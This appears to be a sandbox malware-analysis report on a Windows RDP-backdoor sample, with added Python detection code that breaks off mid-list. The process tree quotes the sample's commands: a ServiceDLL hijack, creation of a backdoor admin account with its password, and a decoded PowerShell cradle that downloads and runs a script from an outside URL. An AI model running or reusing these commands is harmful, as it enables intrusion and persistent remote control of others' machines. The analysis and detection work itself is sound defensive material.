Analysis

max time kernel: 132s
max time network: 133s
platform: windows10_x64
resource: win10v20201028
submitted: 08-11-2020 17:43

Static task: static1
Behavioral task: behavioral1
  Sample: 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
  Resource: win10v20201028
General

Target: 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
Size: 3.4MB
MD5: af944f00c218cc525ef7e56f5d634cdf
SHA1: 532a7870f610b86ef3c1eb3f10b60a9da6152bcb
SHA256: 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2
SHA512: 62b68e3651ae7a0222bc3a16442994b9c6d6505965e7b081bac168659b6eb97bbbb0cc5db260e65f4185017de62a5dc16c37347e447467db75ae062022533014
Malware Config

Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges.
Blacklisted process makes network request (9 IoCs)
Processes:
  flows 15, 17, 18, 19, 21, 23, 25, 27, 29: pid 1260 powershell.exe
Modifies RDP port number used by Windows (1 TTP)
Sets DLL path for service in the registry (2 TTPs)
Resources matching YARA rule upx:
  \Windows\Branding\mediasrv.png
  \Windows\Branding\mediasvc.png
Deletes itself (1 IoC)
Processes:
  pid 3892 powershell.exe
Loads dropped DLL (2 IoCs)
Processes:
  pid 1056 (process name not recorded)
Modifies service (2 TTPs, 2 IoCs)
Processes:
  reg.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters
  reg.exe: Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"
Drops file in Program Files directory (4 IoCs)
Processes (all powershell.exe):
  File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
  File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
  File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
  File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
Drops file in Windows directory (19 IoCs)
Processes (all powershell.exe):
  File created C:\Windows\branding\mediasvc.png
  File created C:\Windows\branding\wupsvc.jpg
  File opened for modification C:\Windows\branding\mediasvc.png
  File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zarfdl2k.zmy.ps1
  File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wbszy3ys.lh4.psm1
  File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
  File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3C7E.tmp
  File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3C9E.tmp
  File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
  File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  File opened for modification C:\Windows\branding\Basebrd
  File opened for modification C:\Windows\branding\wupsvc.jpg
  File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3CEE.tmp
  File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3BE1.tmp
  File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3CDE.tmp
  File created C:\Windows\branding\mediasrv.png
  File opened for modification C:\Windows\branding\ShellBrd
  File opened for modification C:\Windows\branding\mediasrv.png
Modifies data under HKEY_USERS (217 IoCs; 64 shown)
Processes: powershell.exe, WMIC.exe
All keys below are under \REGISTRY\USER\S-1-5-20 (S-1-5-20 is the NT AUTHORITY\NETWORK SERVICE account, so this is that account's user hive). Written by powershell.exe unless noted.
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
  Key created Software\Microsoft\SystemCertificates\SmartCardRoot
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"
  Key created Software\Microsoft\SystemCertificates\trust\Certificates
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"
  Key created Software\Policies\Microsoft\SystemCertificates\CA\Certificates
  Key created Software\Policies\Microsoft\SystemCertificates\TrustedPeople
  Key created Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"
  Key created Software\Microsoft\SystemCertificates\Root\CTLs
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\
  Key created SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"
  Key created Software\Microsoft
  Set value (str) Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"
  Key created Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
  Key created Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup
  Set value (data) Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000
  Key created Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
  Key created Software\Policies\Microsoft\SystemCertificates\trust\CRLs
  Key created Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."
  Key created Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
  Key created Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"
  Key created Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
  Key created Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
  Key created Software\Policies\Microsoft\SystemCertificates\CA\CTLs
  Key created Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0
  Key created Software\Microsoft\SystemCertificates\Disallowed
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
  Set value (data) Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."
  Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"
  Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\
  Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"
Modifies registry key (1 TTP, 1 IoC)

Runs net.exe
Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
Processes:
  HTTP User-Agent header, flows 17, 18, 19, 21: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (9 IoCs)
Processes:
  pid 3892 powershell.exe (6 entries)
  pid 1260 powershell.exe (3 entries)
Suspicious behavior: LoadsDriver (2 IoCs)
Processes:
  pid 616 (process name not recorded)
Suspicious use of AdjustPrivilegeToken (77 IoCs; 64 shown)
Processes:
  pid 3892 powershell.exe adjusted the following tokens, in this order:
  Token: SeDebugPrivilege
  then, three times in succession, this block of 21:
  Token: SeIncreaseQuotaPrivilege
  Token: SeSecurityPrivilege
  Token: SeTakeOwnershipPrivilege
  Token: SeLoadDriverPrivilege
  Token: SeSystemProfilePrivilege
  Token: SeSystemtimePrivilege
  Token: SeProfSingleProcessPrivilege
  Token: SeIncBasePriorityPrivilege
  Token: SeCreatePagefilePrivilege
  Token: SeBackupPrivilege
  Token: SeRestorePrivilege
  Token: SeShutdownPrivilege
  Token: SeDebugPrivilege
  Token: SeSystemEnvironmentPrivilege
  Token: SeRemoteShutdownPrivilege
  Token: SeUndockPrivilege
  Token: SeManageVolumePrivilege
  Token: 33
  Token: 34
  Token: 35
  Token: 36
Suspicious use of WriteProcessMemory (68 IoCs; 64 shown, each write recorded twice)
Processes (source PID and image -> target PID and image):
  PID 1400 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe -> PID 3892 powershell.exe
  PID 3892 powershell.exe -> PID 744 csc.exe
  PID 744 csc.exe -> PID 2228 cvtres.exe
  PID 3892 powershell.exe -> PID 188 reg.exe
  PID 3892 powershell.exe -> PID 3932 reg.exe
  PID 3892 powershell.exe -> PID 3456 reg.exe
  PID 3892 powershell.exe -> PID 3384 net.exe
  PID 3384 net.exe -> PID 2932 net1.exe
  PID 3892 powershell.exe -> PID 2260 cmd.exe
  PID 2260 cmd.exe -> PID 2756 cmd.exe
  PID 2756 cmd.exe -> PID 2228 net.exe
  PID 2228 net.exe -> PID 744 net1.exe
  PID 3892 powershell.exe -> PID 2144 cmd.exe
  PID 2144 cmd.exe -> PID 1908 cmd.exe
  PID 1908 cmd.exe -> PID 2792 net.exe
  PID 2792 net.exe -> PID 360 net1.exe
  PID 3828 cmd.exe -> PID 3852 net.exe
  PID 3852 net.exe -> PID 68 net1.exe
  PID 1220 cmd.exe -> PID 2668 net.exe
  PID 2668 net.exe -> PID 3264 net1.exe
  PID 2320 cmd.exe -> PID 3384 net.exe
  PID 3384 net.exe -> PID 2168 net1.exe
  PID 2212 cmd.exe -> PID 1264 net.exe
  PID 1264 net.exe -> PID 3996 net1.exe
  PID 2724 cmd.exe -> PID 2692 net.exe
  PID 2692 net.exe -> PID 2432 net1.exe
  PID 3456 cmd.exe -> PID 3264 net.exe
  PID 3264 net.exe -> PID 1404 net1.exe
  PID 716 cmd.exe -> PID 580 WMIC.exe
  PID 3892 powershell.exe -> PID 2212 cmd.exe
  PID 1784 cmd.exe -> PID 3932 WMIC.exe
  PID 3892 powershell.exe -> PID 2660 cmd.exe
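The "Sets DLL path for service in the registry" and "Modifies service" signatures above say the TermService ServiceDLL was pointed at \Windows\branding\mediasrv.png, and YARA matched the upx rule on both "png" files. The check below is an added example, not part of the sandbox report: it walks a PE section table to tell whether a file dropped with an image extension is really a PE, and whether its sections carry UPX names. The file it tests against is a minimal PE32+ header built by build_fake_upx_pe (a constructed stand-in, not the real sample), and the function names are this example's own.

```python
"""Spot a PE hiding behind an image extension, and UPX section names.
Added example for this report; not code from the sandbox or the sample."""
import os
import struct
from typing import Dict, List, Optional

IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def pe_section_names(data: bytes) -> Optional[List[str]]:
    """Return the section names of a PE image, or None if data is not a PE.
    Walks MZ -> e_lfanew (offset 0x3C) -> 'PE\\0\\0' -> COFF header -> section table."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (nsections,) = struct.unpack_from("<H", data, e_lfanew + 6)   # COFF NumberOfSections
    (size_opt,) = struct.unpack_from("<H", data, e_lfanew + 20)   # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + size_opt                                # first IMAGE_SECTION_HEADER
    names = []
    for i in range(nsections):
        off = table + 40 * i                                        # each header is 40 bytes, Name first
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def classify_dropped_file(path: str, data: bytes) -> Dict[str, object]:
    """Flag a PE behind an image extension (masquerading) and UPX section names."""
    names = pe_section_names(data)
    ext = os.path.splitext(path)[1].lower()
    return {
        "path": path,
        "is_pe": names is not None,
        "masquerading": names is not None and ext in IMAGE_EXTENSIONS,
        "upx_sections": [n for n in (names or []) if n.upper().startswith("UPX")],
        "sections": names or [],
    }


def build_fake_upx_pe() -> bytes:
    """Constructed stand-in for mediasrv.png: a PE32+ header whose section table
    reads UPX0/UPX1/.rsrc and which carries no code. It parses; it does not run."""
    e_lfanew = 0x80
    dos = bytearray(b"MZ") + bytearray(e_lfanew - 2)
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    size_opt = 240                                                  # PE32+ optional header size
    coff = struct.pack("<HHIIIHH", 0x8664, 3, 0, 0, 0, size_opt, 0x2022)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x20B)                           # PE32+ magic
    table = b"".join(name.ljust(8, b"\0") + bytes(32) for name in (b"UPX0", b"UPX1", b".rsrc"))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
```

On a live host the same check runs over whatever the ServiceDLL value points at: a ServiceDLL outside System32 that parses as a PE is the finding, and UPX section names on top of it are what the YARA hit in this report corresponds to.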
Processes

Tree depth is shown in brackets; the indented line under each image path is the recorded command line, followed by the signatures hit by that process.

[1] C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
    "C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe"
    - Suspicious use of WriteProcessMemory
  [2] \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      - Deletes itself
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE08.tmp" "c:\Users\Admin\AppData\Local\Temp\x4qns4nh\CSC2BC06D68D97C49B4A01877BFEAB6C4F7.TMP"
    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        (0x1C21 is 7201 decimal; the default RDP port is 3389)
    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies service
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            net start TermService
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user updwin Ghasar4f5 /del
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe user updwin Ghasar4f5 /del
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user updwin Ghasar4f5 /del

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user updwin qVojyFfh /add
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe user updwin qVojyFfh /add
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user updwin qVojyFfh /add

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Administrators" updwin /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user updwin qVojyFfh
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe user updwin qVojyFfh
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user updwin qVojyFfh

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic path win32_VideoController get name
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic CPU get NAME
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\Wbem\WMIC.exe
      wmic CPU get NAME
      - Modifies data under HKEY_USERS

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe
      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        (the -enc argument is base64 of UTF-16LE text and decodes to: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL listed under Malware Config)
        - Blacklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
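The process tree above is a compact RDP-enabling chain: move the RDP-Tcp port, redirect the TermService ServiceDLL to a file under C:\Windows\branding, disable the WDDM RDP driver, put NETWORK SERVICE and a new local user into Administrators and Remote Desktop Users, then pull a second stage with an encoded PowerShell download cradle. The script below is an added example, not part of the sandbox report: it decodes the -enc payload the way powershell.exe does (base64 over UTF-16LE) and runs a small set of command-line rules over process-creation records. The record layout and rule names are this example's own; the first seven SAMPLE_EVENTS copy command lines from the tree, the last two are constructed benign controls that must stay quiet.

```python
"""Decode -enc payloads and flag the RDP-enabling command lines seen above.
Added example for this report; not code from the sandbox or the sample."""
import base64
import re
from collections import namedtuple
from typing import Callable, List, Optional, Tuple

# Copied from the depth-3 powershell.exe command line in the process tree.
ENC_PAYLOAD = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcA"
    "aQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMA"
    "cQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)

Finding = namedtuple("Finding", "rule image detail")


def decode_encoded_command(b64: str) -> str:
    """powershell -EncodedCommand / -enc carries the script as base64(UTF-16LE)."""
    return base64.b64decode(b64).decode("utf-16-le")


def _servicedll_detail(m: "re.Match") -> Optional[str]:
    target = m.group("dll").strip('"')
    # The genuine TermService ServiceDLL is %SystemRoot%\System32\termsrv.dll;
    # anything else (here a ".png" under C:\Windows\branding) is a hijack.
    if target.lower().endswith("\\system32\\termsrv.dll"):
        return None
    return f"TermService ServiceDLL redirected to {target}"


def _cradle_detail(m: "re.Match") -> Optional[str]:
    try:
        script = decode_encoded_command(m.group("b64"))
    except (ValueError, UnicodeDecodeError):
        return "undecodable -enc payload"
    if not re.search(r"downloadstring|downloadfile|invoke-webrequest|webclient", script, re.I):
        return None  # encoded, but not a download cradle: stay quiet
    urls = re.findall(r"https?://[^\s\"')]+", script)
    return "download cradle fetches " + (", ".join(urls) or "(no URL found)")


# (rule name, case-insensitive regex over the command line, detail builder).
# A rule fires only when its builder returns text, so legitimate values stay quiet.
RULES: List[Tuple[str, str, Callable]] = [
    ("rdp_port_changed",
     r"\\winstations\\rdp-tcp.*?/v\s+portnumber\b.*?/d\s+(?P<val>\S+)",
     lambda m: f"RDP-Tcp PortNumber = {m.group('val')} ({int(m.group('val'), 0)} decimal; default 3389)"),
    ("termservice_servicedll_hijacked",
     r"\\services\\termservice\\parameters.*?/v\s+servicedll\b.*?/d\s+(?P<dll>\"[^\"]+\"|\S+)",
     _servicedll_detail),
    ("rdp_wddm_driver_disabled",
     r"/v\s+fenablewddmdriver\b.*?/d\s+0\b", lambda m: "fEnableWddmDriver=0"),
    ("local_admin_group_member_added",
     r"\bnet(?:1|\.exe)?\"?\s+localgroup\s+\"?administrators\"?\s+(?P<who>\"[^\"]+\"|\S+)\s+/add\b",
     lambda m: f"Administrators += {m.group('who')}"),
    ("rdp_group_member_added",
     r"\bnet(?:1|\.exe)?\"?\s+localgroup\s+\"remote desktop users\"\s+(?P<who>\S+)\s+/add\b",
     lambda m: f"Remote Desktop Users += {m.group('who')}"),
    ("local_user_created",
     r"\bnet(?:1|\.exe)?\"?\s+user\s+(?P<user>\S+)\s+\S+\s+/add\b",
     lambda m: f"local user {m.group('user')} created, password on the command line"),
    ("encoded_powershell_download_cradle",
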